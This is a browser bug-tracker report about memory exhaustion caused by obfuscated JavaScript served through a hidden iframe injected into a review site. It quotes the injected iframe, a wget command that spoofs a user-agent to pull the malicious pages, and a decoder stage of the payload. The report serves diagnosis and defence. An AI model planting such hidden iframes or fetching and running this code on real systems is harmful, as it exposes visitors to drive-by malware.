Closed
Bug 419159
Opened 16 years ago
Closed 13 years ago
Memory hog on some "web attack toolkit" on andyserver.info
Categories
(Core :: JavaScript Engine, defect)
Tracking
()
RESOLVED
WORKSFORME
People
(Reporter: glandium, Unassigned)
Details
Attachments
(1 file)
28.48 KB,
application/x-gzip
|
Details |
[Copy/pasted from http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=442201 ] I'm seeing this bug using epiphany, but also with other related web browsers (firefox/iceweasel), so you'll probably want to pass it up the library chain. Today something apparently changed on the sfreviews.net site, since when I visited it, epiphany began to use > 400 mb of memory and just sucked down more and more until things got ugly. It had been ok yesterday. I'm ccing its webmaster, since I trust him, and his normally well-behaved and informative site is doing something very wrong and strange. The strange thing seems to be this, near the end of the sfreviews.net front page: <iframe name="3" src="http://andyserver.info/check/version.php?t=179" width=1 height=1 style="display:none"></iframe></body> I don't know what this is there for, but it yeilds the file I've named "crashme.html" in the attached tarball. This is where things get dodgy, because andyserver.info appears to be a spyware domain (just google for it). It would be nice if attempted windows trojans didn't accidentially crash our web browsers.. crashme.html contains 9 more iframes named n1404-[1-9].htm. andyserver.info doesn't allow you to wget these unless you fool with the user-agent string and pretend to be a real web browser: joey@kodama:~>wget -U "Mozilla/5.0 (X11; U; Linux i686; en; rv:1.8.1.6) Gecko/20070801 (Debian-1.8.1.6-1) Epiphany/2.18" 'http://andyserver.info/check/n1404-8.htm' Just loading n1404-3.htm causes epiphany to use 229 mb of memory. The others increase the memory usage by different amounts, apparently. When they're all loaded together as is done by the iframe in crashme.html, the result is not pretty. These files are where things get really strange and ugly, since they consist of a pile of obfuscated javascript. The javascript can be decoded in 2 stages. First, replace the first "document.write" with "alert". This yeilds an alert box with the second-stage decoder: function twxcdimun(rrr){var temp=""; document.write("------------"); var ccc=0; var out="";var str=rrr;l=str.length;while(ccc<=str.length-1){while(str.charAt(ccc)!='N')temp=temp+str.charAt(ccc++);ccc++;out=out+String.fromCharCode(((parseInt(temp,16)-84)));temp="";}document.write(out);} Then just replace the if block you modified before with the above code, and modify the new code s/document.write/alert/ again. This yeilds a new page with yet more javascript in it, I've not tried to work out what this second layer is supposed to do, although it does contain yet a third layer, encoded just as badly. Workaround: Disable javascript :-/ or null-route andyserver.info
Reporter | ||
Comment 1•16 years ago
|
||
FWIW, it seems to suck a bit less memory on Firefox 3.0b3
Updated•16 years ago
|
Assignee: nobody → general
Component: General → JavaScript Engine
QA Contact: general → general
Reporter | ||
Comment 2•13 years ago
|
||
Looks like this doesn't suck memory anymore on aurora.
Status: NEW → RESOLVED
Closed: 13 years ago
Resolution: --- → WORKSFORME
You need to log in
before you can comment on or make changes to this bug.
Description
•